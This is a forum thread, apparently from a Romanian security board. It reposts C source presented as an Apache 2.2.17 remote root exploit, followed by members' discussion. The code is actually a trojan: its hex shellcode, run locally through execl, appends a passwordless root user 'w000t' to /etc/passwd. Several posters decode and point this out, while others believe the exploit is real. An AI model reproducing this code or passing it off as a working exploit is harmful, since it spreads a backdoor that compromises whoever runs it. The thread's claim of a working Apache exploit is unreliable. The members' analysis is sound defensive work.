Apache 2.2.17 remote root exploit

[Nytro]

Apache 2.2.17 remote root exploit

/* apachesm4sh.c apache 2.2.17 remote root exploit*/
/* KEEP PRIV8&!&! leak and i will find you  ~ desg */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char evil[] =   
	 	"\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
        	"\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
        	"\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
        	"\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
        	"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
        	"\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
        	"\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
        	"\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
        	"\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
        	"\x44\x44";

#define	NOP	0x90
#define	BSIZE	1000
#define	OFFSET	400
#define	ADDR	0xbffff658
#define ASIZE	2000

int
main(int argc, char *argv[])
{
	char *buffer;
	int s;
	struct hostent *hp;
	struct sockaddr_in sin;
	if (argc != 2) {
		printf("%s <target>\n", argv[0]);
		exit(1);
	  }
	buffer = (char *) malloc(BSIZE + ASIZE + 100);
	if (buffer == NULL) {
		printf("Not enough memory\n");
		exit(1);
	  }
	memcpy(&buffer[BSIZE - strlen(evil)], evil,
		strlen(evil));
	buffer[BSIZE + ASIZE] = ';';
	buffer[BSIZE + ASIZE + 1] = '\0';
	hp = gethostbyname(argv[1]);
	if (hp == NULL) {
		printf("no such server\n");
		exit(1);
	  }
	bzero(&sin, sizeof(sin));
	bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(80);
	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (s < 0) {
		printf("Can't open socket\n");
		exit(1);
	  }
	if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
		printf("Connection refused\n");
		exit(1);
	  }
	printf("sending exploit code...\n");
	if (send(s, buffer, strlen(buffer), 0) != 1)
		printf("exploit was successful!\n");
	  else
		printf("sorry, this site isn't vulnerable\n");
	printf("waiting for shell.....\n");
	if (fork() == 0)
		execl("/bin/sh", "sh", "-c", evil, 0);
	  else
		wait(NULL);
	while (1) { /* shell */ }
}

Sau: [C] /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and - Pastebin.com

Discutie aici, e posibil sa nu fie exploit: Full Disclosure: Apache 2.2.17 exploit?

[gogusan]

ooo daa, 10x!

[Fed0t]

ooo daa, 10x!

gogusan si merge l-ai incercat?

[adi003user]

It's a trojan, based on the w00t-shell.c code

[fjtr]

super tare, adaugat la colectie

[icemerc]

am testat acum

e backedoor care daca e rulat cu drept de root adauga un user w00t cu drept de root, deci nu il folositi

[Nytro]

Acel "evil" hex se termina cu:

"/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD"

Trimite datele unde ziceti voi:

send(s, buffer, strlen(buffer), 0)

Asta e executat local...

execl("/bin/sh", "sh", "-c", evil, 0);

Deci cred ca e fake, backdoor, deci nu executati (cel putin NU ca root). Sau scoateti:

if (fork() == 0)
		execl("/bin/sh", "sh", "-c", evil, 0);
	  else
		wait(NULL);

Desi acesta e posibil sa fie necesar pentru shell. Nu stiu ce fac primele instructiuni, daca am timp si reusesc sa dezasamblez datele din hex, poate imi dau seama daca infecteaza sau nu.

Deocamdata nu sunt sigur daca e backdoor sau nu, rulati ca user normal si nu ar trebui sa fie probleme.

[Fed0t]

eu zic ca e bun...face buffer overflow pe tinta...si deschide o sesiune

[Nytro]

Cred ca e fake, cel putin asa spun niste persoane care l-au analizat.

Creeaza un cont de root fara parola.